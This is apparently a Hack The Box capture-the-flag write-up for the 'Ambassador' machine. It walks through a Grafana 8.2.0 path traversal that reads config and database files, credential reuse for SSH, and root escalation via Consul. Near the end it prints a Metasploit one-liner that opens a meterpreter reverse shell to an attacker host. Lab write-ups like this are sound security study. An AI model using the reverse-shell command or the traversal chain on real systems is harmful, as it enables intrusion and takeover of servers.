Ambassador

Some nice Writeup

Scan Details

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
3000/tcp open  ppp     syn-ack
3306/tcp open  mysql   syn-ack

looking at port 3000 we are presented with a login page which is running grafana with a version 8.2.0, vulnerable to Directory Traversal and Arbitrary File Read to local files. The vulnerable path grafana_url/public/plugins/<'plugin-id'> where <'plugin id'> is the plugin id for any installed plugin.

Every grafana instance comes with pre-installed plugins like Prometheus plugin or MySQL plugin so with this multiple URLS are vulnerable for every instance.

Enumeration.

We can reach the log in screen and find out the grafana version, in our case using port 3000 (Version v8.2.0 (d7f71e9eae)

Using curl we can also query the /login page

Exploitation (Script)

So having identified the version of the application, we can confirm the application is vulnerable, using this https://www.exploit-db.com/exploits/50581 automated script we can read files.

We can try all the known readable config files to find interesting information, based on their documentation (https://github.com/grafana/grafana/blob/main/conf/defaults.ini), /etc/grafana/grafana.ini seems interesting, since it holds user/password info under the security section..

Exploitation (Manual)

We can use curl to read the database files and store them locally.

Now using sqlite3 we can read the database file, there is data source table that holds user information.

Having the password from the database checking the .ini file we get some sql credentials we can use to login into the mysql server, which gives us whackywidget databases some information.

Foothold.

Now, having the password from the database we can ssh with the user developer and get the user flag.

Root Privesc (metasploit version).

Having logged in as the developer user, looking around in the opt directory we find two folders consul and my-app, which my-app has some interesting logs

From the logs, we identify it's running a Hashicorp Consul's services API researching online we find that consul can be exploited to gain remote command execution on Consul nodes.

sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost Your_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit"

Using the above metasploit command we get a root shell,

Root Privesc (Manual).

I will later add the manual method to exploiting consul using the api................

PreviousHacktheboxNextAwkward

Last updated